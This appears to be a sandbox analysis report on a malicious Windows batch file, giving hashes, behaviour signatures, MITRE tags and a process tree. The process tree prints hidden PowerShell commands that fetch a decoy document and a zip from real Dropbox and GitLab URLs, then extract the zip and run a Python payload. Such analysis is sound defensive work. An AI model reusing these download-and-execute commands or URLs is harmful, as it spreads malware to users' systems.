53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-11-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat
Size

32KB
MD5

07fda94f9503d182add2888e54973080
SHA1

d26a59c6dc0dbbb11234f25c0aca89249a4667e3
SHA256

53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446
SHA512

6ae2024925bdae757e218d81bb5a997968c3b577549005a4e734a4b2f8b54a51a9df1642f8f98e4261488bd064dbe3b879e06cc64592c09d8bf78a3fc76890b7
SSDEEP

768:cWL/KYF7Izmkd5F2QVl5xpOI4qGcHet97v/EHY92Xw++leE+f:GJ2eaCd

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

5 1980 powershell.exe
6 1980 powershell.exe
9 2800 powershell.exe
10 2800 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1604 powershell.exe
1980 powershell.exe
2928 powershell.exe
2800 powershell.exe
2772 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1980 powershell.exe
2928 powershell.exe
2800 powershell.exe
2772 powershell.exe
1604 powershell.exe

flow	pid	process
5	1980	powershell.exe
6	1980	powershell.exe
9	2800	powershell.exe
10	2800	powershell.exe

pid	process
1604	powershell.exe
1980	powershell.exe
2928	powershell.exe
2800	powershell.exe
2772	powershell.exe

pid	process
1980	powershell.exe
2928	powershell.exe
2800	powershell.exe
2772	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2368 wrote to memory of 1636	2368	cmd.exe	chcp.com
PID 2368 wrote to memory of 1636	2368	cmd.exe	chcp.com
PID 2368 wrote to memory of 1636	2368	cmd.exe	chcp.com
PID 2368 wrote to memory of 768	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 768	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 768	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 2348	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2348	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2348	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 1796	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 1796	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 1796	2368	cmd.exe	find.exe
PID 2368 wrote to memory of 2600	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2600	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2600	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1684	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1684	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1684	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2984	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2984	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2984	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1320	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1320	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 1320	2368	cmd.exe	findstr.exe
PID 2368 wrote to memory of 2500	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2500	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2500	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 1980	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 1980	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 1980	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2928	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2928	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2928	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2800	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2800	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2800	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2772	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2772	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 2772	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 1604	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 1604	2368	cmd.exe	powershell.exe
PID 2368 wrote to memory of 1604	2368	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\system32\chcp.com
  chcp.com 437
  2⤵
  PID:1636
- C:\Windows\system32\find.exe
  find
  2⤵
  PID:768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:2348
- C:\Windows\system32\find.exe
  fInd
  2⤵
  PID:1796
- C:\Windows\system32\findstr.exe
  fiNdstr /L /I set C:\Users\Admin\AppData\Local\Temp\53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat
  2⤵
  PID:2600
- C:\Windows\system32\findstr.exe
  fiNdstr /L /I goto C:\Users\Admin\AppData\Local\Temp\53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat
  2⤵
  PID:1684
- C:\Windows\system32\findstr.exe
  fiNdstr /L /I echo C:\Users\Admin\AppData\Local\Temp\53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat
  2⤵
  PID:2984
- C:\Windows\system32\findstr.exe
  fiNdstr /L /I pause C:\Users\Admin\AppData\Local\Temp\53eee95df04e2db4b9582c284db560c4fd98d0702a56054b45536e158f7f7446.bat
  2⤵
  PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type tmp
  2⤵
  PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1', 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip', 'C:\Users\Public\Document.zip')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp

Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7faaea469930bfe54e9a9ba55c211a1c

SHA1
3363249153afc483e427368c7f05e2e36da8fd2a

SHA256
cf0eb0977617c410ec466990de3ede4defd7d9ec63675ebba8a12512ee3de77d

SHA512
c179912872174582a30403cd6114fc65a272abb968c9a2b0344f56e1e13d59f463e0786b42203603dbeb61240959981c3839226ae51e61beaa4ad6cd94523e92

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1980-8-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/1980-9-0x000000001B2A0000-0x000000001B582000-memory.dmp

Filesize
2.9MB

Download
memory/1980-10-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/1980-11-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/2928-17-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/2928-18-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download